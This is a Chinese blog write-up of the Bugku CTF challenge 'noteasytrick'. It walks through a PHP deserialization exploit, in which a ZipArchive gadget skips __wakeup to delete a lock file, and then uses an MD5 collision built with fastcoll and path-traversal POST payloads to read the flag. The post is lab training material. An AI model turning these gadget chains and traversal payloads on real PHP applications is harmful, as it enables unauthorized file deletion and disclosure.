Bugku noteasytrick

明裕学长

已于 2022-05-09 17:54:23 修改

阅读量440

点赞数 2

分类专栏： CTF解题文章标签： php 开发语言

于 2022-05-09 12:07:59 首次发布

本文链接：https://blog.csdn.net/m0_50553973/article/details/124663200

版权

CTF解题专栏收录该内容

24 篇文章 4 订阅

订阅专栏

打开环境

<?php
error_reporting(0);
ini_set("display_errors","Off");
class Jesen {
    public $filename;
    public $content;
    public $me;

    function __wakeup(){
        $this->me = new Ctf();
    }
    function __destruct() {
        $this->me->open($this->filename,$this->content);
    }
}

class Ctf {
    function __toString() {
        return "die";
    }
    function open($filename, $content){
        if(!file_get_contents("./sandbox/lock.lock")){
            echo file_get_contents(substr($_POST['b'],0,30));
            die();
        }else{
            file_put_contents("./sandbox/".md5($filename.time()),$content);
            die("or you can guess the final filename?"); 
        }
        
    }
}

if(!isset($_POST['a'])){
    highlight_file(__FILE__);
    die();
}else{
    if(($_POST['b'] != $_POST['a']) && (md5($_POST['b']) === md5($_POST['a']))){
        unserialize($_POST['c']);
    }

}

第一步需要绕过wakeup
然后进这里后 ./sandbox/lock.lock这个文件存在就会到else，我们试试访问这个文件，发现它是存在的，所以到else
else这里很明显是让我们猜文件名
但它文件名又是通过md5加密的

通过运行脚本获取参数然后带入删除文件

<?php
class Jesen {

    public $filename = './sandbox/lock.lock';
    public $content = 8;
    public $me;}
$a = new  Jesen();
$zip  = new  ZipArchive;
$a->me = $zip;
$b = serialize($a);
$b = str_replace('":3:','":4:',$b);
echo $b;
echo "\n";

然后post上传

a[]=1&b[]=2&c=O:5:"Jesen":4:{s:8:"filename";s:19:"./sandbox/lock.lock";s:7:"content";i:8;s:2:"me";O:10:"ZipArchive":5:{s:6:"status";i:0;s:9:"statusSys";i:0;s:8:"numFiles";i:0;s:8:"filename";s:0:"";s:7:"comment";s:0:"";}}

这里要利用fastcoll这个工具
fastcoll

./../../../../../../../../flag

这里跑出来两个文件
我还是不太确定是否成功
所以用php脚本检查一下

<?php
function readmyfile($path){
    $fh=fopen($path,"rb");
    $data=fread($fh,filesize($path));
    fclose($fh);
    return$data;
}
echo md5( (readmyfile("1.txt")));
echo '============================';
//echo urlencode(readmyfile("1.txt"));
echo md5( (readmyfile("2.txt")));
//echo '============================';
//echo urlencode(readmyfile("2.txt"));

运行

发现确实一样
所以可以直接URL编码了

<?php
function readmyfile($path){
    $fh=fopen($path,"rb");
    $data=fread($fh,filesize($path));
    fclose($fh);
    return$data;
}
//echo md5( (readmyfile("1.txt")));
//echo '============================';
echo urlencode(readmyfile("1.txt"));
//echo md5( (readmyfile("2.txt")));
echo '============================';
echo urlencode(readmyfile("2.txt"));

然后有a，b了我们还需要c的值

<?php
class Jesen{
    public$filename;
    public$content;
    public$me;

}

$a = new Jesen();
echo serialize($a);

然后进行post传参就能得到flag了

a=.%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflag%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%9B%BC%F2%25o%E6W%DD%A5%DBB%2F%19%95%D6%9F%2AH%9F%EA%0F%FE%D1%D3%FC9%3F%C9%10%92%94%EB%03%B5%F0%E5%E3e%1E%C1o.%C7b%FFe%A1_%3A%F1Dg%9Fh%858%84%9Fdj%E5%82%03%19l%CA%E4%BB%E3%0F+%968%18%81.%25n%7E%A2u%10%D7%9B%FE%CB%1Cn%7E%DF%EF%CF%5BP%A5A%A8%EF%B4%A9%14%CA%AA%5E%2A%91%EB0k%E0%CF%E6%1E%8EL%FF%81-%E41%0F%FF%B2iL%8C%F8%BD&b=.%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflag%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%9B%BC%F2%25o%E6W%DD%A5%DBB%2F%19%95%D6%9F%2AH%9Fj%0F%FE%D1%D3%FC9%3F%C9%10%92%94%EB%03%B5%F0%E5%E3e%1E%C1o.%C7b%FF%E5%A1_%3A%F1Dg%9Fh%858%84%9Fd%EA%E5%82%03%19l%CA%E4%BB%E3%0F+%968%18%81.%25n%7E%A2u%10%D7%1B%FE%CB%1Cn%7E%DF%EF%CF%5BP%A5A%A8%EF%B4%A9%14%CA%AA%5E%2A%91%EB0k%60%CF%E6%1E%8EL%FF%81-%E41%0F%FF%B2%E9L%8C%F8%BD&c=O:5:"Jesen":3:{s:8:"filename";N;s:7:"content";N;s:2:"me";N;}

解出flag

有什么不清楚可以留言

明裕学长

关注

2
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
Bugku noteasytrick

打开环境<?phperror_reporting(0);ini_set("display_errors","Off");class Jesen { public $filename; public $content; public $me; function __wakeup(){ $this->me = new Ctf(); } function __destruct() { $this->me
复制链接

扫一扫